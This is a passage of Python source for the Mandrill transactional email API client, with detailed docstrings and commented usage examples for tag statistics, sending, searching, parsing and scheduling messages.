stats.last_7_days.opens (integer): the number of times emails have been opened with this tag in the last 7 days
stats.last_7_days.unique_opens (integer): the number of unique opens for emails sent with this tag in the last 7 days
stats.last_7_days.clicks (integer): the number of URLs that have been clicked with this tag in the last 7 days
stats.last_7_days.unique_clicks (integer): the number of unique clicks for emails sent with this tag in the last 7 days
stats.last_30_days (struct): stats with this tag in the last 30 days::
stats.last_30_days.sent (integer): the number of emails sent with this tag in the last 30 days
stats.last_30_days.hard_bounces (integer): the number of emails hard bounced with this tag in the last 30 days
stats.last_30_days.soft_bounces (integer): the number of emails soft bounced with this tag in the last 30 days
stats.last_30_days.rejects (integer): the number of emails rejected with this tag in the last 30 days
stats.last_30_days.complaints (integer): the number of spam complaints with this tag in the last 30 days
stats.last_30_days.unsubs (integer): the number of unsubscribes with this tag in the last 30 days
stats.last_30_days.opens (integer): the number of times emails have been opened with this tag in the last 30 days
stats.last_30_days.unique_opens (integer): the number of unique opens for emails sent with this tag in the last 30 days
stats.last_30_days.clicks (integer): the number of URLs that have been clicked with this tag in the last 30 days
stats.last_30_days.unique_clicks (integer): the number of unique clicks for emails sent with this tag in the last 30 days
stats.last_60_days (struct): stats with this tag in the last 60 days::
stats.last_60_days.sent (integer): the number of emails sent with this tag in the last 60 days
stats.last_60_days.hard_bounces (integer): the number of emails hard bounced with this tag in the last 60 days
stats.last_60_days.soft_bounces (integer): the number of emails soft bounced with this tag in the last 60 days
stats.last_60_days.rejects (integer): the number of emails rejected with this tag in the last 60 days
stats.last_60_days.complaints (integer): the number of spam complaints with this tag in the last 60 days
stats.last_60_days.unsubs (integer): the number of unsubscribes with this tag in the last 60 days
stats.last_60_days.opens (integer): the number of times emails have been opened with this tag in the last 60 days
stats.last_60_days.unique_opens (integer): the number of unique opens for emails sent with this tag in the last 60 days
stats.last_60_days.clicks (integer): the number of URLs that have been clicked with this tag in the last 60 days
stats.last_60_days.unique_clicks (integer): the number of unique clicks for emails sent with this tag in the last 60 days
stats.last_90_days (struct): stats with this tag in the last 90 days::
stats.last_90_days.sent (integer): the number of emails sent with this tag in the last 90 days
stats.last_90_days.hard_bounces (integer): the number of emails hard bounced with this tag in the last 90 days
stats.last_90_days.soft_bounces (integer): the number of emails soft bounced with this tag in the last 90 days
stats.last_90_days.rejects (integer): the number of emails rejected with this tag in the last 90 days
stats.last_90_days.complaints (integer): the number of spam complaints with this tag in the last 90 days
stats.last_90_days.unsubs (integer): the number of unsubscribes with this tag in the last 90 days
stats.last_90_days.opens (integer): the number of times emails have been opened with this tag in the last 90 days
stats.last_90_days.unique_opens (integer): the number of unique opens for emails sent with this tag in the last 90 days
stats.last_90_days.clicks (integer): the number of URLs that have been clicked with this tag in the last 90 days
stats.last_90_days.unique_clicks (integer): the number of unique clicks for emails sent with this tag in the last 90 days
Raises:
InvalidTagNameError: The requested tag does not exist or contains invalid characters
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'tag': tag}
return self.master.call('tags/info', _params)
def time_series(self, tag):
"""Return the recent history (hourly stats for the last 30 days) for a tag
Args:
tag (string): an existing tag name
Returns:
array. the array of history information::
[] (struct): the stats for a single hour::
[].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format
[].sent (integer): the number of emails that were sent during the hour
[].hard_bounces (integer): the number of emails that hard bounced during the hour
[].soft_bounces (integer): the number of emails that soft bounced during the hour
[].rejects (integer): the number of emails that were rejected during the hour
[].complaints (integer): the number of spam complaints received during the hour
[].unsubs (integer): the number of unsubscribes received during the hour
[].opens (integer): the number of emails opened during the hour
[].unique_opens (integer): the number of unique opens generated by messages sent during the hour
[].clicks (integer): the number of tracked URLs clicked during the hour
[].unique_clicks (integer): the number of unique clicks generated by messages sent during the hour
Raises:
InvalidTagNameError: The requested tag does not exist or contains invalid characters
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'tag': tag}
return self.master.call('tags/time-series', _params)
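# Usage sketch (illustrative): derive a 30-day unique open rate for one tag
# from the hourly buckets above. The tag name is a placeholder; the guard
# avoids dividing by zero for a tag with no sends.
#
#     hours = client.tags.time_series(tag='welcome-email')
#     sent = sum(h['sent'] for h in hours)
#     if sent:
#         rate = 100.0 * sum(h['unique_opens'] for h in hours) / sent
#         print('unique open rate: %.1f%%' % rate)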
def all_time_series(self):
"""Return the recent history (hourly stats for the last 30 days) for all tags
Returns:
array. the array of history information::
[] (struct): the stats for a single hour::
[].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format
[].sent (integer): the number of emails that were sent during the hour
[].hard_bounces (integer): the number of emails that hard bounced during the hour
[].soft_bounces (integer): the number of emails that soft bounced during the hour
[].rejects (integer): the number of emails that were rejected during the hour
[].complaints (integer): the number of spam complaints received during the hour
[].unsubs (integer): the number of unsubscribes received during the hour
[].opens (integer): the number of emails opened during the hour
[].unique_opens (integer): the number of unique opens generated by messages sent during the hour
[].clicks (integer): the number of tracked URLs clicked during the hour
[].unique_clicks (integer): the number of unique clicks generated by messages sent during the hour
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('tags/all-time-series', _params)
class Messages(object):
def __init__(self, master):
self.master = master
def send(self, message, async=False, ip_pool=None, send_at=None):
"""Send a new transactional message through Mandrill
Args:
message (struct): the information on the message to send::
message.html (string): the full HTML content to be sent
message.text (string): optional full text content to be sent
message.subject (string): the message subject
message.from_email (string): the sender email address.
message.from_name (string): optional from name to be used
message.to (array): an array of recipient information.::
message.to[] (struct): a single recipient's information.::
message.to[].email (string): the email address of the recipient
message.to[].name (string): the optional display name to use for the recipient
message.to[].type (string): the header type to use for the recipient, defaults to "to" if not provided
message.headers (struct): optional extra headers to add to the message (most headers are allowed)
message.important (boolean): whether or not this message is important, and should be delivered ahead of non-important messages
message.track_opens (boolean): whether or not to turn on open tracking for the message
message.track_clicks (boolean): whether or not to turn on click tracking for the message
message.auto_text (boolean): whether or not to automatically generate a text part for messages that are not given text
message.auto_html (boolean): whether or not to automatically generate an HTML part for messages that are not given HTML
message.inline_css (boolean): whether or not to automatically inline all CSS styles provided in the message HTML - only for HTML documents less than 256KB in size
message.url_strip_qs (boolean): whether or not to strip the query string from URLs when aggregating tracked URL data
message.preserve_recipients (boolean): whether or not to expose all recipients in the "To" header for each email
message.view_content_link (boolean): set to false to remove content logging for sensitive emails
message.bcc_address (string): an optional address to receive an exact copy of each recipient's email
message.tracking_domain (string): a custom domain to use for tracking opens and clicks instead of mandrillapp.com
message.signing_domain (string): a custom domain to use for SPF/DKIM signing instead of mandrill (for "via" or "on behalf of" in email clients)
message.return_path_domain (string): a custom domain to use for the message's return-path
message.merge (boolean): whether to evaluate merge tags in the message. Will automatically be set to true if either merge_vars or global_merge_vars are provided.
message.global_merge_vars (array): global merge variables to use for all recipients. You can override these per recipient.::
message.global_merge_vars[] (struct): a single global merge variable::
message.global_merge_vars[].name (string): the global merge variable's name. Merge variable names are case-insensitive and may not start with _
message.global_merge_vars[].content (string): the global merge variable's content
message.merge_vars (array): per-recipient merge variables, which override global merge variables with the same name.::
message.merge_vars[] (struct): per-recipient merge variables::
message.merge_vars[].rcpt (string): the email address of the recipient that the merge variables should apply to
message.merge_vars[].vars (array): the recipient's merge variables::
message.merge_vars[].vars[] (struct): a single merge variable::
message.merge_vars[].vars[].name (string): the merge variable's name. Merge variable names are case-insensitive and may not start with _
message.merge_vars[].vars[].content (string): the merge variable's content
message.tags (array): an array of strings to tag the message with. Stats are accumulated using tags, though we only store the first 100 we see, so this should not be unique or change frequently. Tags should be 50 characters or less. Any tags starting with an underscore are reserved for internal use and will cause errors.::
message.tags[] (string): a single tag - must not start with an underscore
message.subaccount (string): the unique id of a subaccount for this message - must already exist or will fail with an error
message.google_analytics_domains (array): an array of domains for which any matching URLs will automatically have Google Analytics parameters appended to their query string.
message.google_analytics_campaign (array|string): optional string indicating the value to set for the utm_campaign tracking parameter. If this isn't provided the email's from address will be used instead.
message.metadata (array): an associative array of user metadata. Mandrill will store this metadata and make it available for retrieval. In addition, you can select up to 10 metadata fields to index and make searchable using the Mandrill search api.
message.recipient_metadata (array): Per-recipient metadata that will override the global values specified in the metadata parameter.::
message.recipient_metadata[] (struct): metadata for a single recipient::
message.recipient_metadata[].rcpt (string): the email address of the recipient that the metadata is associated with
message.recipient_metadata[].values (array): an associative array containing the recipient's unique metadata. If a key exists in both the per-recipient metadata and the global metadata, the per-recipient metadata will be used.
message.attachments (array): an array of supported attachments to add to the message::
message.attachments[] (struct): a single supported attachment::
message.attachments[].type (string): the MIME type of the attachment
message.attachments[].name (string): the file name of the attachment
message.attachments[].content (string): the content of the attachment as a base64-encoded string
message.images (array): an array of embedded images to add to the message::
message.images[] (struct): a single embedded image::
message.images[].type (string): the MIME type of the image - must start with "image/"
message.images[].name (string): the Content ID of the image - use <img src="cid:THIS_VALUE"> to reference the image in your HTML content
message.images[].content (string): the content of the image as a base64-encoded string
async (boolean): enable a background sending mode that is optimized for bulk sending. In async mode, messages/send will immediately return a status of "queued" for every recipient. To handle rejections when sending in async mode, set up a webhook for the 'reject' event. Defaults to false for messages with no more than 10 recipients; messages with more than 10 recipients are always sent asynchronously, regardless of the value of async.
ip_pool (string): the name of the dedicated ip pool that should be used to send the message. If you do not have any dedicated IPs, this parameter has no effect. If you specify a pool that does not exist, your default pool will be used instead.
send_at (string): when this message should be sent as a UTC timestamp in YYYY-MM-DD HH:MM:SS format. If you specify a time in the past, the message will be sent immediately. An additional fee applies for scheduled email, and this feature is only available to accounts with a positive balance.
Returns:
array. of structs for each recipient containing the key "email" with the email address and "status" as either "sent", "queued", "scheduled", "rejected", or "invalid"::
[] (struct): the sending results for a single recipient::
[].email (string): the email address of the recipient
[].status (string): the sending status of the recipient - either "sent", "queued", "scheduled", "rejected", or "invalid"
[].reject_reason (string): the reason for the rejection if the recipient status is "rejected"
[]._id (string): the message's unique id
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
PaymentRequiredError: The requested feature requires payment.
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'message': message, 'async': async, 'ip_pool': ip_pool, 'send_at': send_at}
return self.master.call('messages/send', _params)
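# Usage sketch (illustrative): a minimal transactional send that sets only a
# few of the many optional keys documented above. Addresses and content are
# placeholders.
#
#     message = {
#         'subject': 'Order received',
#         'from_email': 'orders@example.com',
#         'to': [{'email': 'customer@example.org', 'type': 'to'}],
#         'html': '<p>Thanks for your order!</p>',
#         'tags': ['order-confirmation'],
#     }
#     for result in client.messages.send(message=message):
#         print('%s %s %s' % (result['email'], result['status'],
#                             result.get('reject_reason')))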
def send_template(self, template_name, template_content, message, async=False, ip_pool=None, send_at=None):
"""Send a new transactional message through Mandrill using a template
Args:
template_name (string): the immutable name or slug of a template that exists in the user's account. For backwards-compatibility, the template name may also be used but the immutable slug is preferred.
template_content (array): an array of template content to send. Each item in the array should be a struct with two keys - name: the name of the content block to set the content for, and content: the actual content to put into the block::
template_content[] (struct): the injection of a single piece of content into a single editable region::
template_content[].name (string): the name of the mc:edit editable region to inject into
template_content[].content (string): the content to inject
message (struct): the other information on the message to send - same as /messages/send, but without the html content::
message.html (string): optional full HTML content to be sent if not in template
message.text (string): optional full text content to be sent
message.subject (string): the message subject
message.from_email (string): the sender email address.
message.from_name (string): optional from name to be used
message.to (array): an array of recipient information.::
message.to[] (struct): a single recipient's information.::
message.to[].email (string): the email address of the recipient
message.to[].name (string): the optional display name to use for the recipient
message.to[].type (string): the header type to use for the recipient, defaults to "to" if not provided
message.headers (struct): optional extra headers to add to the message (most headers are allowed)
message.important (boolean): whether or not this message is important, and should be delivered ahead of non-important messages
message.track_opens (boolean): whether or not to turn on open tracking for the message
message.track_clicks (boolean): whether or not to turn on click tracking for the message
message.auto_text (boolean): whether or not to automatically generate a text part for messages that are not given text
message.auto_html (boolean): whether or not to automatically generate an HTML part for messages that are not given HTML
message.inline_css (boolean): whether or not to automatically inline all CSS styles provided in the message HTML - only for HTML documents less than 256KB in size
message.url_strip_qs (boolean): whether or not to strip the query string from URLs when aggregating tracked URL data
message.preserve_recipients (boolean): whether or not to expose all recipients in the "To" header for each email
message.view_content_link (boolean): set to false to remove content logging for sensitive emails
message.bcc_address (string): an optional address to receive an exact copy of each recipient's email
message.tracking_domain (string): a custom domain to use for tracking opens and clicks instead of mandrillapp.com
message.signing_domain (string): a custom domain to use for SPF/DKIM signing instead of mandrill (for "via" or "on behalf of" in email clients)
message.return_path_domain (string): a custom domain to use for the message's return-path
message.merge (boolean): whether to evaluate merge tags in the message. Will automatically be set to true if either merge_vars or global_merge_vars are provided.
message.global_merge_vars (array): global merge variables to use for all recipients. You can override these per recipient.::
message.global_merge_vars[] (struct): a single global merge variable::
message.global_merge_vars[].name (string): the global merge variable's name. Merge variable names are case-insensitive and may not start with _
message.global_merge_vars[].content (string): the global merge variable's content
message.merge_vars (array): per-recipient merge variables, which override global merge variables with the same name.::
message.merge_vars[] (struct): per-recipient merge variables::
message.merge_vars[].rcpt (string): the email address of the recipient that the merge variables should apply to
message.merge_vars[].vars (array): the recipient's merge variables::
message.merge_vars[].vars[] (struct): a single merge variable::
message.merge_vars[].vars[].name (string): the merge variable's name. Merge variable names are case-insensitive and may not start with _
message.merge_vars[].vars[].content (string): the merge variable's content
message.tags (array): an array of strings to tag the message with. Stats are accumulated using tags, though we only store the first 100 we see, so this should not be unique or change frequently. Tags should be 50 characters or less. Any tags starting with an underscore are reserved for internal use and will cause errors.::
message.tags[] (string): a single tag - must not start with an underscore
message.subaccount (string): the unique id of a subaccount for this message - must already exist or will fail with an error
message.google_analytics_domains (array): an array of domains for which any matching URLs will automatically have Google Analytics parameters appended to their query string.
message.google_analytics_campaign (array|string): optional string indicating the value to set for the utm_campaign tracking parameter. If this isn't provided the email's from address will be used instead.
message.metadata (array): an associative array of user metadata. Mandrill will store this metadata and make it available for retrieval. In addition, you can select up to 10 metadata fields to index and make searchable using the Mandrill search api.
message.recipient_metadata (array): Per-recipient metadata that will override the global values specified in the metadata parameter.::
message.recipient_metadata[] (struct): metadata for a single recipient::
message.recipient_metadata[].rcpt (string): the email address of the recipient that the metadata is associated with
message.recipient_metadata[].values (array): an associative array containing the recipient's unique metadata. If a key exists in both the per-recipient metadata and the global metadata, the per-recipient metadata will be used.
message.attachments (array): an array of supported attachments to add to the message::
message.attachments[] (struct): a single supported attachment::
message.attachments[].type (string): the MIME type of the attachment
message.attachments[].name (string): the file name of the attachment
message.attachments[].content (string): the content of the attachment as a base64-encoded string
message.images (array): an array of embedded images to add to the message::
message.images[] (struct): a single embedded image::
message.images[].type (string): the MIME type of the image - must start with "image/"
message.images[].name (string): the Content ID of the image - use <img src="cid:THIS_VALUE"> to reference the image in your HTML content
message.images[].content (string): the content of the image as a base64-encoded string
async (boolean): enable a background sending mode that is optimized for bulk sending. In async mode, messages/send will immediately return a status of "queued" for every recipient. To handle rejections when sending in async mode, set up a webhook for the 'reject' event. Defaults to false for messages with no more than 10 recipients; messages with more than 10 recipients are always sent asynchronously, regardless of the value of async.
ip_pool (string): the name of the dedicated ip pool that should be used to send the message. If you do not have any dedicated IPs, this parameter has no effect. If you specify a pool that does not exist, your default pool will be used instead.
send_at (string): when this message should be sent as a UTC timestamp in YYYY-MM-DD HH:MM:SS format. If you specify a time in the past, the message will be sent immediately. An additional fee applies for scheduled email, and this feature is only available to accounts with a positive balance.
Returns:
array. of structs for each recipient containing the key "email" with the email address and "status" as either "sent", "queued", "scheduled", "rejected", or "invalid"::
[] (struct): the sending results for a single recipient::
[].email (string): the email address of the recipient
[].status (string): the sending status of the recipient - either "sent", "queued", "scheduled", "rejected", or "invalid"
[].reject_reason (string): the reason for the rejection if the recipient status is "rejected"
[]._id (string): the message's unique id
Raises:
UnknownTemplateError: The requested template does not exist
PaymentRequiredError: The requested feature requires payment.
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'template_name': template_name, 'template_content': template_content, 'message': message, 'async': async, 'ip_pool': ip_pool, 'send_at': send_at}
return self.master.call('messages/send-template', _params)
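# Usage sketch (illustrative): send through a stored template, filling one
# mc:edit region and one merge variable. The template, region, and variable
# names are placeholders.
#
#     results = client.messages.send_template(
#         template_name='order-confirmation',
#         template_content=[{'name': 'body', 'content': '<p>Order details</p>'}],
#         message={
#             'subject': 'Order received',
#             'to': [{'email': 'customer@example.org'}],
#             'global_merge_vars': [{'name': 'ORDERID', 'content': '12345'}],
#         })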
def search(self, query='*', date_from=None, date_to=None, tags=None, senders=None, api_keys=None, limit=100):
"""Search the content of recently sent messages and optionally narrow by date range, tags and senders
Args:
query (string): the search terms to find matching messages for
date_from (string): start date
date_to (string): end date
tags (array): an array of tag names to narrow the search to, will return messages that contain ANY of the tags
senders (array): an array of sender addresses to narrow the search to, will return messages sent by ANY of the senders
api_keys (array): an array of API keys to narrow the search to, will return messages sent by ANY of the keys
limit (integer): the maximum number of results to return, defaults to 100, 1000 is the maximum
Returns:
array. of structs for each matching message::
[] (struct): the information for a single matching message::
[].ts (integer): the Unix timestamp from when this message was sent
[]._id (string): the message's unique id
[].sender (string): the email address of the sender
[].template (string): the unique name of the template used, if any
[].subject (string): the message's subject line
[].email (string): the recipient email address
[].tags (array): list of tags on this message::
[].tags[] (string): individual tag on this message
[].opens (integer): the number of times this message has been opened
[].opens_detail (array): list of individual opens for the message::
[].opens_detail[] (struct): information on an individual open::
[].opens_detail[].ts (integer): the unix timestamp from when the message was opened
[].opens_detail[].ip (string): the IP address that generated the open
[].opens_detail[].location (string): the approximate region and country that the opening IP is located
[].opens_detail[].ua (string): the email client or browser data of the open
[].clicks (integer): the number of times a link in this message has been clicked
[].clicks_detail (array): list of individual clicks for the message::
[].clicks_detail[] (struct): information on an individual click::
[].clicks_detail[].ts (integer): the unix timestamp from when the message was clicked
[].clicks_detail[].url (string): the URL that was clicked on
[].clicks_detail[].ip (string): the IP address that generated the click
[].clicks_detail[].location (string): the approximate region and country that the clicking IP is located
[].clicks_detail[].ua (string): the email client or browser data of the click
[].state (string): sending status of this message: sent, bounced, rejected
[].metadata (struct): any custom metadata provided when the message was sent
[].smtp_events (array): a log of up to 3 smtp events for the message::
[].smtp_events[] (struct): information about a specific smtp event::
[].smtp_events[].ts (integer): the Unix timestamp when the event occurred
[].smtp_events[].type (string): the message's state as a result of this event
[].smtp_events[].diag (string): the SMTP response from the recipient's server
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
ServiceUnavailableError: The subsystem providing this API call is down for maintenance
Error: A general Mandrill error has occurred
"""
_params = {'query': query, 'date_from': date_from, 'date_to': date_to, 'tags': tags, 'senders': senders, 'api_keys': api_keys, 'limit': limit}
return self.master.call('messages/search', _params)
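# Usage sketch (illustrative): narrow a content search to one tag over a one
# week window. The query term and dates are placeholders.
#
#     for msg in client.messages.search(query='example.org',
#                                       date_from='2013-01-01',
#                                       date_to='2013-01-08',
#                                       tags=['order-confirmation']):
#         print('%s %s %s' % (msg['_id'], msg['email'], msg['state']))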
def search_time_series(self, query='*', date_from=None, date_to=None, tags=None, senders=None):
"""Search the content of recently sent messages and return the aggregated hourly stats for matching messages
Args:
query (string): the search terms to find matching messages for
date_from (string): start date
date_to (string): end date
tags (array): an array of tag names to narrow the search to, will return messages that contain ANY of the tags
senders (array): an array of sender addresses to narrow the search to, will return messages sent by ANY of the senders
Returns:
array. the array of history information::
[] (struct): the stats for a single hour::
[].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format
[].sent (integer): the number of emails that were sent during the hour
[].hard_bounces (integer): the number of emails that hard bounced during the hour
[].soft_bounces (integer): the number of emails that soft bounced during the hour
[].rejects (integer): the number of emails that were rejected during the hour
[].complaints (integer): the number of spam complaints received during the hour
[].unsubs (integer): the number of unsubscribes received during the hour
[].opens (integer): the number of emails opened during the hour
[].unique_opens (integer): the number of unique opens generated by messages sent during the hour
[].clicks (integer): the number of tracked URLs clicked during the hour
[].unique_clicks (integer): the number of unique clicks generated by messages sent during the hour
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
ServiceUnavailableError: The subsystem providing this API call is down for maintenance
Error: A general Mandrill error has occurred
"""
_params = {'query': query, 'date_from': date_from, 'date_to': date_to, 'tags': tags, 'senders': senders}
return self.master.call('messages/search-time-series', _params)
def info(self, id):
"""Get the information for a single recently sent message
Args:
id (string): the unique id of the message to get - passed as the "_id" field in webhooks, send calls, or search calls
Returns:
struct. the information for the message::
ts (integer): the Unix timestamp from when this message was sent
_id (string): the message's unique id
sender (string): the email address of the sender
template (string): the unique name of the template used, if any
subject (string): the message's subject line
email (string): the recipient email address
tags (array): list of tags on this message::
tags[] (string): individual tag on this message
opens (integer): the number of times this message has been opened
opens_detail (array): list of individual opens for the message::
opens_detail[] (struct): information on an individual open::
opens_detail[].ts (integer): the unix timestamp from when the message was opened
opens_detail[].ip (string): the IP address that generated the open
opens_detail[].location (string): the approximate region and country that the opening IP is located
opens_detail[].ua (string): the email client or browser data of the open
clicks (integer): the number of times a link in this message has been clicked
clicks_detail (array): list of individual clicks for the message::
clicks_detail[] (struct): information on an individual click::
clicks_detail[].ts (integer): the unix timestamp from when the message was clicked
clicks_detail[].url (string): the URL that was clicked on
clicks_detail[].ip (string): the IP address that generated the click
clicks_detail[].location (string): the approximate region and country that the clicking IP is located
clicks_detail[].ua (string): the email client or browser data of the click
state (string): sending status of this message: sent, bounced, rejected
metadata (struct): any custom metadata provided when the message was sent
smtp_events (array): a log of up to 3 smtp events for the message::
smtp_events[] (struct): information about a specific smtp event::
smtp_events[].ts (integer): the Unix timestamp when the event occurred
smtp_events[].type (string): the message's state as a result of this event
smtp_events[].diag (string): the SMTP response from the recipient's server
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownMessageError: The provided message id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('messages/info', _params)
def content(self, id):
"""Get the full content of a recently sent message
Args:
id (string): the unique id of the message to get - passed as the "_id" field in webhooks, send calls, or search calls
Returns:
struct. the content of the message::
ts (integer): the Unix timestamp from when this message was sent
_id (string): the message's unique id
from_email (string): the email address of the sender
from_name (string): the alias of the sender (if any)
subject (string): the message's subject line
to (struct): the message recipient's information::
to.email (string): the email address of the recipient
to.name (string): the alias of the recipient (if any)
tags (array): list of tags on this message::
tags[] (string): individual tag on this message
headers (struct): the key-value pairs of the custom MIME headers for the message's main document
text (string): the text part of the message, if any
html (string): the HTML part of the message, if any
attachments (array): an array of any attachments that can be found in the message::
attachments[] (struct): information about an individual attachment::
attachments[].name (string): the file name of the attachment
attachments[].type (string): the MIME type of the attachment
attachments[].content (string): the content of the attachment as a base64 encoded string
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownMessageError: The provided message id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('messages/content', _params)
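# Usage sketch (illustrative): combine info and content for a message id
# captured from a send call or webhook (`message_id` is assumed to come from
# elsewhere).
#
#     info = client.messages.info(id=message_id)
#     if info['opens'] == 0:
#         body = client.messages.content(id=message_id)
#         print('%s (%d bytes of HTML)' % (body['subject'],
#                                          len(body.get('html') or '')))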
def parse(self, raw_message):
"""Parse the full MIME document for an email message, returning the content of the message broken into its constituent pieces
Args:
raw_message (string): the full MIME document of an email message
Returns:
struct. the parsed message::
subject (string): the subject of the message
from_email (string): the email address of the sender
from_name (string): the alias of the sender (if any)
to (array): an array of any recipients in the message::
to[] (struct): the information on a single recipient::
to[].email (string): the email address of the recipient
to[].name (string): the alias of the recipient (if any)
headers (struct): the key-value pairs of the MIME headers for the message's main document
text (string): the text part of the message, if any
html (string): the HTML part of the message, if any
attachments (array): an array of any attachments that can be found in the message::
attachments[] (struct): information about an individual attachment::
attachments[].name (string): the file name of the attachment
attachments[].type (string): the MIME type of the attachment
attachments[].binary (boolean): if this is set to true, the attachment is not pure-text, and the content will be base64 encoded
attachments[].content (string): the content of the attachment as a text string or a base64 encoded string based on the attachment type
images (array): an array of any embedded images that can be found in the message::
images[] (struct): information about an individual image::
images[].name (string): the Content-ID of the embedded image
images[].type (string): the MIME type of the image
images[].content (string): the content of the image as a base64 encoded string
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'raw_message': raw_message}
return self.master.call('messages/parse', _params)
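# Usage sketch (illustrative): split a raw MIME document into its parts
# without sending anything; `raw` is a full MIME string as in the inbound
# sketch earlier.
#
#     parsed = client.messages.parse(raw_message=raw)
#     print('%s from %s' % (parsed['subject'], parsed['from_email']))
#     for att in parsed.get('attachments') or []:
#         print('%s (%s)' % (att['name'], att['type']))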
def send_raw(self, raw_message, from_email=None, from_name=None, to=None, async=False, ip_pool=None, send_at=None, return_path_domain=None):
"""Take a raw MIME document for a message, and send it exactly as if it were sent through Mandrill's SMTP servers
Args:
raw_message (string): the full MIME document of an email message
from_email (string|null): optionally define the sender address - otherwise we'll use the address found in the provided headers
from_name (string|null): optionally define the sender alias
to (array|null): optionally define the recipients to receive the message - otherwise we'll use the To, Cc, and Bcc headers provided in the document::
to[] (string): the email address of the recipient
async (boolean): enable a background sending mode that is optimized for bulk sending. In async mode, messages/send-raw will immediately return a status of "queued" for every recipient. To handle rejections when sending in async mode, set up a webhook for the 'reject' event. Defaults to false for messages with no more than 10 recipients; messages with more than 10 recipients are always sent asynchronously, regardless of the value of async.
ip_pool (string): the name of the dedicated ip pool that should be used to send the message. If you do not have any dedicated IPs, this parameter has no effect. If you specify a pool that does not exist, your default pool will be used instead.
send_at (string): when this message should be sent as a UTC timestamp in YYYY-MM-DD HH:MM:SS format. If you specify a time in the past, the message will be sent immediately.
return_path_domain (string): a custom domain to use for the messages's return-path
Returns:
array. of structs for each recipient containing the key "email" with the email address and "status" as either "sent", "queued", or "rejected"::
[] (struct): the sending results for a single recipient::
[].email (string): the email address of the recipient
[].status (string): the sending status of the recipient - either "sent", "queued", "scheduled", "rejected", or "invalid"
[].reject_reason (string): the reason for the rejection if the recipient status is "rejected"
[]._id (string): the message's unique id
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
PaymentRequiredError: The requested feature requires payment.
UnknownTemplateError: The requested template does not exist
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'raw_message': raw_message, 'from_email': from_email, 'from_name': from_name, 'to': to, 'async': async, 'ip_pool': ip_pool, 'send_at': send_at, 'return_path_domain': return_path_domain}
return self.master.call('messages/send-raw', _params)
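# A hedged example of messages/send-raw (hypothetical addresses; `client` and
# `raw` are as in the parse sketch above):
#
#   result = client.messages.send_raw(raw_message=raw,
#                                     from_email='sender@example.com',
#                                     to=['rcpt@example.com'])
#   for recipient in result:
#       print(recipient['email'] + ': ' + recipient['status'])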
def list_scheduled(self, to=None):
"""Queries your scheduled emails by sender or recipient, or both.
Args:
to (string): an optional recipient address to restrict results to
Returns:
array. a list of up to 1000 scheduled emails::
[] (struct): a scheduled email::
[]._id (string): the scheduled message id
[].created_at (string): the UTC timestamp when the message was created, in YYYY-MM-DD HH:MM:SS format
[].send_at (string): the UTC timestamp when the message will be sent, in YYYY-MM-DD HH:MM:SS format
[].from_email (string): the email's sender address
[].to (string): the email's recipient
[].subject (string): the email's subject
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'to': to}
return self.master.call('messages/list-scheduled', _params)
def cancel_scheduled(self, id):
"""Cancels a scheduled email.
Args:
id (string): a scheduled email id, as returned by any of the messages/send calls or messages/list-scheduled
Returns:
struct. information about the scheduled email that was cancelled.::
_id (string): the scheduled message id
created_at (string): the UTC timestamp when the message was created, in YYYY-MM-DD HH:MM:SS format
send_at (string): the UTC timestamp when the message will be sent, in YYYY-MM-DD HH:MM:SS format
from_email (string): the email's sender address
to (string): the email's recipient
subject (string): the email's subject
Raises:
UnknownMessageError: The provided message id does not exist.
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('messages/cancel-scheduled', _params)
def reschedule(self, id, send_at):
"""Reschedules a scheduled email.
Args:
id (string): a scheduled email id, as returned by any of the messages/send calls or messages/list-scheduled
send_at (string): the new UTC timestamp when the message should be sent. Mandrill can't time travel, so if you specify a time in the past the message will be sent immediately
Returns:
struct. information about the scheduled email that was rescheduled.::
_id (string): the scheduled message id
created_at (string): the UTC timestamp when the message was created, in YYYY-MM-DD HH:MM:SS format
send_at (string): the UTC timestamp when the message will be sent, in YYYY-MM-DD HH:MM:SS format
from_email (string): the email's sender address
to (string): the email's recipient
subject (string): the email's subject
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownMessageError: The provided message id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'id': id, 'send_at': send_at}
return self.master.call('messages/reschedule', _params)
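# A sketch of the scheduled-message workflow (hypothetical recipient and
# timestamp): list scheduled mail, then reschedule or cancel by id.
#
#   scheduled = client.messages.list_scheduled(to='rcpt@example.com')
#   if scheduled:
#       msg_id = scheduled[0]['_id']
#       client.messages.reschedule(msg_id, '2015-01-01 12:00:00')
#       client.messages.cancel_scheduled(msg_id)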
class Whitelists(object):
def __init__(self, master):
self.master = master
def add(self, email):
"""Adds an email to your email rejection whitelist. If the address is
currently on your blacklist, that blacklist entry will be removed
automatically.
Args:
email (string): an email address to add to the whitelist
Returns:
struct. a status object containing the address and the result of the operation::
email (string): the email address you provided
added (boolean): whether the operation succeeded
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
